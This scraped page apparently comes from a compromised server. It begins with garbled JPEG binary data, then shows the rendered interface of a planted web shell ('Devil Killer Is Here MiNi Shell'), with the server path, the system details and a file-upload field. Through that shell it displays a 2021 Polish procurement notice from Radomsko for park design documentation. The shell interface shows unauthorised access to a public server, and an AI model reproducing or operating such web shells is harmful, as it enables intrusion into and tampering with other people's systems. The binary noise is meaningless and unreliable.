JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210910/0017771501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie<br/> przestrzeni rekreacyjno – wypoczynkowej „Glinianki”– Etap II zadania dokumentacja projektowa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Radomsko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648238</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tysiąclecia 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radomsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@radomsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.radomsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie<br/> przestrzeni rekreacyjno – wypoczynkowej „Glinianki”– Etap II zadania dokumentacja projektowa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3510c2fc-122a-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00177715</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001079/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie przestrzeni rekreacyjno-wypoczynkowej „Glinianki” – Etap II wykonanie dokumentacji projektowej CPV 71200000-0, 71320000-7</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalny Program Operacyjny Województwa Łódzkiego na lata 2014-2020 w ramach Osi Priorytetowej VI – Rewitalizacja i potencjał endogeniczny regionu, Działanie VI.2 Rozwój gospodarki turystycznej, Poddziałanie VI.2.1. Rozwój gospodarki turystycznej, projekt pn.: Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie przestrzeni rekreacyjno - wypoczynkowej "Glinianki" </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.radomsko.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Oferty należy złożyć za pomocą<br/>miniPortalu: https://miniportal.uzp.gov.pl . W postępowaniu o udzielenie zamówienia komunikacja<br/>między Zamawiającym a Wykonawcami odbywa się przy użyciu: 1) miniPortalu, który dostępny jest pod<br/>adresem: https://miniportal.uzp.gov.pl ; 2) ePUAP (Elektroniczna Skrzynka Podawcza –nazwa- Miasto<br/>Radomsko, adres skrzynki EPUAP: /umradomsko/skrytkaesp ; 3) adres poczty elektronicznej:<br/>zamowienia@radomsko.pl ; 4) https://bip.radomsko.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia musi posiadać konto<br/>na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: Złożenia, zmiany,<br/>wycofania oferty lub wniosku oraz do Formularza komunikacji.<br/>2) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych<br/>( w tym m.in. elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich<br/>użyciu) zostały opisane w Regulaminie korzystania z systemu miniPortalu<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP) https://www.gov.pl/web/gov/warunki-korzystania .<br/>3) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosków oraz do komunikacji wynosi 150 MB.<br/>4) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych( w tym m.in.<br/>oświadczeń,elektronicznych kopii dokumentów lub innych informacji ) przyjmuje się datę ich przekazania na ePUAP.<br/>5) Identyfikator postępowania dla danego postępowania dostępny jest w Liście wszystkich postępowań<br/>na miniPortalu oraz stanowi dodatek nr 9 do SWZ. Dane postępowania można wyszukać na Liście<br/>wszystkich postępowań w miniPortalu klikając wcześniej na opcję " Dla Wykonawców" lub ze strony<br/>głównej z zakładki "POSTĘPOWANIA".<br/>6) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawcami w<br/>szczególności składanie oświadczeń, wniosków ( innych niż złożone<br/>oferty), zawiadomień oraz przekazywanie informacji odbywa sie elektronicznie za pośrednictwem<br/>dedykowanego formularza dostępnego na platformie e-PUAP (https://epuap.gov.pl/wps/portal) -<br/>Elektroniczna Skrzynka Podawcza- nazwa- Miasto Radomsko, adres skrzynki<br/>EPUAP:/umradomsko/skrytkaesp) oraz udostępnionego przez miniPortal (Formularz do komunikacji).<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i wykonawcy<br/>posługują się numerem ogłoszenia (BZP lub ID postępowania na miniPortalu) lub numerem<br/>postępowania nadanym przez Zamawiającego PZP.271.1.18.2021 .<br/>7) Komunikacja pomiędzy Zamawiającym a Wykonawcami może również odbywać się za pomocą<br/>poczty elektronicznej e-mail: zamowienia@radomsko.pl.( maksymalny rozmiar przesyłanych plików<br/>20MB).<br/>8) Szczegółowe informacje w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dotycząca RODO - szczegółowo określona w<br/>Rozdziale 24 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja dotycząca RODO - szczegółowo określona w<br/>Rozdziale 24 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZP.271.1.18.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1 Przedmiotem zamówienia jest: wykonanie dokumentacji projektowej dla zadania pn.: „Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie przestrzeni rekreacyjno – wypoczynkowej „Glinianki” – Etap II zadania wykonanie dokumentacji projektowej”.<br/> <br/> 2. Zamawiający zleca, a Wykonawca zobowiązuje się do:<br/> 1) Wykonania dokumentacji projektowej zgodnie z postanowieniami Umowy.<br/> 2) Uzyskania w imieniu Zamawiającego wszelkich wymaganych prawem opinii i uzgodnień.<br/>3. W ramach przedmiotu zamówienia należy opracować:<br/>1) Dwu-wariantową koncepcję architektoniczną w oparciu o szkic zagospodarowania terenu ( Dodatek nr 12 do SWZ) oraz koncepcję zagospodarowania terenu parku w Radomsku ( Dodatek nr 13 do SWZ) przedstawione przez Zamawiającego i spełniającą wymagania zawarte w umowie ( wzór Dodatek nr 10 do SWZ) oraz w Programie Funkcjonalno-Użytkowym;<br/>2) Projekt budowlany (projekt zagospodarowania działki lub terenu, projekt architektoniczno-budowlany, projekt techniczny, załączniki projektu budowlanego) i wykonawczy  ‑ 5 egzemplarzy – obejmujący w szczególności:<br/> a) roboty przygotowawcze, rozbiórkowe, ziemne i inne konieczne dla prawidłowej realizacji zadania inwestycyjnego, <br/> b) budowę i ukształtowanie górki saneczkowej,<br/> c) budowę sceny typu amfiteatr,<br/> d) edukacyjne obiekty małej architektury,<br/> e) projekt instalacji monitoringu CCTV, <br/> f) budowę widowni plenerowej,<br/> g) budowę budynków toalety ,<br/> h) Budowa tężni solankowej <br/> i) budowę ściany 3D do grafiki,<br/> j) budowę zespołu fontann multimedialnych,<br/> k) budowę parkingów i ciągów komunikacyjnych,<br/> l) budowę zjazdów na teren inwestycji z przyległych dróg publicznych,<br/> m) budowę zielonych ścian,<br/> n) budowę kładki stalowo - żelbetowo – szklanej,<br/> o) budowę obiektów małej architektury,<br/> p) budowę strefy: „pumtrack”, „northshore”,<br/> q) budowę schodów terenowych wraz z platformami dla niepełnosprawnych,<br/> r) budowę sieci, przyłączy i instalacji wodno-kanalizacyjnych,<br/> s) budowę sieci, przyłączy i instalacji elektrycznych, oświetleniowych,<br/> t) budowę sieci, przyłączy i instalacji telekomunikacyjnych,<br/> u) odwodnienie terenu inwestycji oraz projektowanych obiektów,<br/> v) likwidację kolizji,<br/> w) wykonanie zaleceń z uzyskanych opinii, uzgodnień, decyzji i innych,<br/> x) wykonanie pozostałych elementów objętych szkicem zagospodarowania terenu( Dodatek nr 12 do SWZ) oraz koncepcję zagospodarowania terenu parku w Radomsku ( Dodatek nr 13 do SWZ) przedstawioną przez Zamawiającego i spełniających wymagania zawarte w Programie Funkcjonalno-Użytkowym.<br/> 3) Projekt urządzenia zieleni na całej nieruchomości,<br/> 4) Wizualizację składająca się minimum z 10 scen fotorealistycznych wizualizacji przedstawiających efekt końcowy,<br/> 5) Specyfikacje Techniczne Wykonania i Odbioru Robót objętych projektem budowlano‑wykonawczym,<br/> 6) Kosztorysy inwestorskie oraz przedmiary robót,<br/> Szczegółowy zakres opracowania i sposób realizacji zamówienia został określony we wzorze umowy stanowiącym dodatek nr 10 do SWZ ,Programie Funkcjonalno-Użytkowym stanowiącym dodatek nr 11 do SWZ , szkicu zagospodarowania terenu stanowiącym dodatek nr 12 do SWZ<br/> oraz koncepcji zagospodarowania terenu parku w Radomsku stanowiącej dodatek nr 13 do SWZ.<br/> 4. Szczegółowy opis przedmiotu zamówienia stanowią:<br/> 1) wzór/projekt umowy - stanowiący dodatek nr 10 do SWZ,<br/> 2) Program Funkcjonalno-Użytkowy stanowiący dodatek nr 11 do SWZ ,<br/> 3) Szkic zagospodarowania terenu - stanowiący dodatek nr 12 do SWZ,<br/> 4) Koncepcja zagospodarowania terenu parku w Radomsku -stanowiąca dodatek nr 13 do SWZ<br/><br/>5 Wymagania jakościowe w związku z zastosowaniem kryterium ceny jako kryterium o wadze przekraczającej 60% odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia zostały określone w opisie przedmiotu zamówienia w Programie Funkcjonalno-Użytkowym, szkicu zagospodarowania terenu, koncepcji zagospodarowania terenu parku w Radomsku oraz przepisach prawnych .<br/>6.Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 305 pkt 1 w zw. z art. 214 ust. 1 pkt 7 ustawy.<br/><br/>7. Zamawiający nie dopuszcza składania ofert częściowych.<br/><br/>Uzasadnienie :<br/><br/>Zadanie pn. „ Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie przestrzeni rekreacyjno - wypoczynkowej "Glinianki" zostało podzielone na poszczególne etapy, z których każdy stanowić będzie przedmiot odrębnego postępowania o udzielenie zamówienia. Przedmiotem niniejszego postępowania jest wykonanie etapu II tj. wykonanie dokumentacji projektowej dla realizacji etapu IV.<br/>Ze względu na charakter przedmiotu zamówienia oraz organizację, podział niniejszego zamówienia na części jest bezzasadny i może utrudniać realizację przedmiotu niniejszego zamówienia dla potencjalnego wykonawcy. Podział niniejszego zamówienia na części spowodowałby trudności realizacyjne, zwiększenie kosztów realizacji oraz ryzyko nieterminowego wykonania zamówienia, a w konsekwencji problemy związane z uzyskaniem jednego wspólnego celu jakim jest opracowanie spójnej wielobranżowej dokumentacji projektowej. Niniejsze zamówienie nie zostało podzielone na części również z uwagi na możliwość utrudnionej koordynacji prac prowadzonych przez niezależnych Wykonawców - projektantów. Niepodzielenie niniejszego zamówienia na części nie naruszy zasady uczciwej konkurencji i nie spowoduje ograniczenia możliwości ubiegania się o zamówienie mniejszym podmiotom. Ze względu na wielkość zamówienia wskazać należy, że zamówienie to jest skierowane do podmiotów z sektora małych i średnich przedsiębiorstw. Ponadto nie ograniczono udziału podwykonawców przy realizacji zamówienia.<br/>8. Zamawiający przewidział, że istnieje możliwość, że o udzielenie zamówienia będzie ubiegał się podmiot, który był zaangażowany w przygotowanie postępowania o udzielenie tego zamówienia w zakresie opisu przedmiotu zamówienia, ustalenia wartości szacunkowej zadania tj. Podmiot, który wykonał Program funkcjonalno-użytkowy oraz Koncepcję zagospodarowania terenu parku w Radomsku odnoszące się do zakresu niniejszego zamównienia oraz dokumentację projektową w tym: projekt techniczny; projekt budowlany; miejscowy plan zagospodarowania przestrzennego; wizualizację, wyciąg z projektu technicznego, opinie geotechniczną, specyfikacje techniczne, kosztorysy i przedmiary dla całego zadania pn. „ Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie przestrzeni rekreacyjno - wypoczynkowej "Glinianki" <br/><br/>W związku z powyższym Zamawiający podjął następujące środki mające na celu zapobieżeniu zakłócenia uczciwej konkurencji w przypadku, o którym mowa w art. 85 ust. 1 ustawy:<br/><br/>- na stronie internetowej prowadzonego postępowania https://bip.radomsko.pl publikuje wszelkie dokumenty jakimi dysponuje dot. niniejszego przedmiotu zamówienia tj.Program funkcjonalno-użytkowy (Dodatek nr 11 do SWZ), Koncepcję zagospodarowania terenu parku w Radomsku (Dodatek nr 13 do SWZ) <br/>- na stronie internetowej prowadzonego postępowania https://bip.radomsko.pl publikuje ponadto w celach informacyjnych dokumentację dotyczącą całego zadania pn „Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie przestrzeni rekreacyjno – wypoczynkowej „Glinianki”sporządzoną przez w/w podmiot tj. :dokumentację projektową w tym: projekt techniczny; projekt budowlany; miejscowy plan zagospodarowania przestrzennego; wizualizację, wyciąg z projektu technicznego, opinie geotechniczną, specyfikacje techniczne( Dodatki do SWZ od nr 14 do nr 16),<br/>9. Całkowita wartość projektu pn.: Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie przestrzeni rekreacyjno - wypoczynkowej "Glinianki" ustalona została na kwotę 10 328 888,89 zł netto(bez podatku VAT)<br/><br/>Wartość zamówienia stanowiąca przedmiot niniejszego postępowania (Etap II – zadania) ustalona została na kwotę 172 243,58 zł netto .<br/><br/>Szacunkową wartość dla niniejszego zamowienia ustalono na podstawie szcunkowego kosztu wykonania robót netto i przyjętego 3% wskażnika procentowego kosztów usługi projektowej tj.:<br/><br/>5741452,58 zł netto x 3%= 172 243,58 zł netto <br/><br/>10. Zamówienie dotyczy projektu współfinansowanego ze środków Unii Europejskiej:<br/><br/>Nazwa projektu lub programu:Regionalny Program Operacyjny Województwa Łódzkiego na lata 2014-2020 w ramach Osi Priorytetowej VI – Rewitalizacja i potencjał endogeniczny regionu, Działanie VI.2 Rozwój gospodarki turystycznej, Poddziałanie VI.2.1. Rozwój gospodarki turystycznej, projekt pn.: Podniesienie atrakcyjności turystycznej Miasta Radomska poprzez stworzenie przestrzeni rekreacyjno - wypoczynkowej "Glinianki" </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71200000-0 - Usługi architektoniczne i podobne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla porównania ofert Zamawiający przyjmie: łączną cenę ryczałtową brutto obejmującą podatek od towarów i usług (z VAT) za wykonanie całości przedmiotu zamówienia – wg przypisanej wagi kryterium Ceny (C) tj. 100 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dotyczy zdolności technicznej lub zawodowej.<br/>Określenie warunków:<br/>1) wymagane jest posiadanie doświadczenia, tj.warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie co najmniej: dwóch usług projektowych których wartość kosztorysowa robót wynikająca z kosztorysu inwestorskiego wynosi co najmniej 1 000 000,00 zł netto każda, w zakresie opracowania dokumentacji projektowej wielobranżowej przebudowy i/lub rozbudowy i/lub budowy parku i/lub terenu zielonego obejmującej także swym zakresem co najmniej opracowanie fontanny i/lub tężni<br/>wraz z podaniem przedmiotu, dat wykonania i podmiotu, na rzecz którego usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; <br/><br/>UWAGA:<br/>Usługi projektowe, które polegały na aktualizacji dokumentacji projektowej nie będą uznane jako spełniające powyżej opisany warunek.<br/><br/>2) dysponuje osobami zdolnymi do wykonania zamówienia tj. co najmniej:<br/><br/> a) osobą, która pełnić będzie funkcję projektanta branży architektonicznej bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie wymaganym do realizacji niniejszego zamówienia lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej,<br/> b) osobą, która pełnić będzie funkcję projektanta branży konstrukcyjno-budowlanej posiadającą uprawnienia do projektowania w specjalności konstrukcyjno‑budowlanej bez ograniczeń zakresie określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie wymaganym do realizacji niniejszego zamówienia lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych 